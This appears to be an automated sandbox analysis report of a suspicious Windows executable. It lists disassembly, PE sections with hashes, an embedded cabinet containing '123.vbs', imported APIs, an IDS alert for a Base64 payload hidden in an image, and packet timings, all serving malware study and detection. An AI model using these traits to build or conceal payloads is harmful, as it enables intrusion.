                                                        mov eax, dword ptr [000048F6h]
                                                        test eax, eax
                                                        jne 00007F47FCB3B3FBh
                                                        mov dword ptr [000048E8h], 00000001h
                                                        dec esp
                                                        lea esi, dword ptr [000013E9h]
                                                        dec eax
                                                        lea ebx, dword ptr [000013CAh]
                                                        dec eax
                                                        mov dword ptr [esp+30h], ebx
                                                        mov dword ptr [esp+24h], eax
                                                        dec ecx
                                                        cmp ebx, esi
                                                        jnc 00007F47FCB3B3C7h
                                                        test eax, eax
                                                        jne 00007F47FCB3B3C7h
                                                        dec eax
                                                        cmp dword ptr [ebx], 00000000h
                                                        je 00007F47FCB3B3B2h
                                                        dec eax
                                                        mov eax, dword ptr [ebx]
                                                        dec eax
                                                        mov ecx, dword ptr [00001388h]
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1d0d8 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2d000 | 0x20 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xf000 | 0x1e000 | 0x1d200 | 8fddb618be6eb207c405389086f4955a | False | 0.740930123390558 | data | 7.057952943108121 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x2d000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
                                                        RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
                                                        RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
                                                        RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
                                                        RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
                                                        RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
                                                        RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
                                                        RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
                                                        RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
                                                        RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
                                                        RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
                                                        RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
                                                        RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
                                                        RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
                                                        RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
                                                        RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
                                                        RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
                                                        RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
                                                        RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
                                                        RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
                                                        RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
                                                        RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
                                                        RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
                                                        RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
                                                        RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
                                                        RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
                                                        RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_RCDATA | 0x29870 | 0x1b40 | Microsoft Cabinet archive data, Windows 2000/XP setup, 6976 bytes, 1 file, at 0x2c +A "123.vbs", ID 527, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0015768348623852
                                                        RT_RCDATA | 0x2b3b0 | 0x4 | data | English | United States | 3.0
                                                        RT_RCDATA | 0x2b3b4 | 0x24 | GLS_BINARY_LSB_FIRST | English | United States | 0.6388888888888888
                                                        RT_RCDATA | 0x2b3d8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_RCDATA | 0x2b3e0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_RCDATA | 0x2b3e8 | 0x4 | data | English | United States | 3.0
                                                        RT_RCDATA | 0x2b3ec | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_RCDATA | 0x2b3f4 | 0x4 | data | English | United States | 3.0
                                                        RT_RCDATA | 0x2b3f8 | 0x13 | ASCII text, with no line terminators | English | United States | 1.4210526315789473
                                                        RT_RCDATA | 0x2b40c | 0x4 | data | English | United States | 3.0
                                                        RT_RCDATA | 0x2b410 | 0xc | data | English | United States | 1.1666666666666667
                                                        RT_RCDATA | 0x2b41c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_RCDATA | 0x2b424 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                        RT_GROUP_ICON | 0x2b42c | 0xbc | data | English | United States | 0.6117021276595744
                                                        RT_VERSION | 0x2b4e8 | 0x408 | data | English | United States | 0.42151162790697677
                                                        RT_MANIFEST | 0x2b8f0 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
                                                        DLL | Import
                                                        ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                        KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                        GDI32.dll | GetDeviceCaps
                                                        USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                        msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                        COMCTL32.dll |
                                                        Cabinet.dll |
                                                        VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T09:33:18.848191+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 185.199.111.133 | 443 | 192.168.2.6 | 49725 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Oct 7, 2024 09:33:17.538533926 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.538592100 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.538604021 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.538620949 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.538681030 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.622262955 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622302055 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622354984 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.622371912 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622391939 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.622432947 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.622594118 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622612953 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622678041 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.622690916 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.622814894 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623040915 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623056889 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623119116 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623131037 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623646021 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623646975 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623657942 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623702049 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623708010 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623728991 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623739958 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.623760939 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.623797894 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.624037027 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624061108 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624115944 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.624128103 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624176025 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.624505043 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624524117 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624574900 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.624588013 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624643087 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.624975920 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.624993086 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.625061035 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.625072956 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.625139952 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.625377893 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.625395060 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.625451088 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.625463963 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.625498056 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.625663996 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709387064 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709448099 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709470034 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709477901 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709516048 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709532022 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709680080 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709721088 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709759951 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709765911 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.709794998 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.709825993 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710047007 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710067034 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710110903 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710117102 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710148096 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710170984 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710388899 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710403919 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710480928 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710486889 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710539103 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710890055 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710905075 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.710962057 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.710968018 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711016893 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.711265087 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711281061 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711325884 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.711329937 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711364031 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.711405039 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.711668968 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711683989 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711743116 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.711749077 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.711847067 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.712047100 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.712063074 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.712111950 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.712120056 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.712147951 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.712168932 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.796549082 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.796567917 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.796632051 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.796638966 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.796685934 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.796956062 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.796971083 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797046900 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797051907 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797101021 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797332048 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797347069 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797395945 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797401905 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797439098 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797454119 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797858000 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797873020 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.797947884 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.797954082 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798017025 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.798094034 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798108101 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798161030 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.798166037 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798230886 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.798398972 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798412085 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798470974 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.798476934 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798727989 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.798938036 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.798954964 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.799000978 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.799006939 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.799027920 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.799073935 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.799282074 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.799297094 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.799379110 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.799388885 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.799433947 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883481979 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883537054 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883579969 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883590937 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883630037 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883641958 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883704901 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883721113 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883754969 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883760929 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.883780956 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.883929014 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884026051 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884042025 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884084940 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884089947 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884115934 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884130955 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884448051 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884462118 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884505987 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884511948 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884535074 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884567022 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884879112 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884893894 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.884948969 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.884954929 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885063887 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885271072 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885284901 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885324001 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885329008 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885351896 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885495901 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885642052 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885657072 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885706902 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885713100 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.885732889 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.885865927 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.886033058 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.886049032 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.886096954 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.886102915 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.886122942 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.886145115 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971159935 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.971205950 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.971266985 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971283913 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.971323013 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971329927 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971338987 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.971369982 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.971405029 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971431017 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.971446037 CEST44349725185.199.111.133192.168.2.6
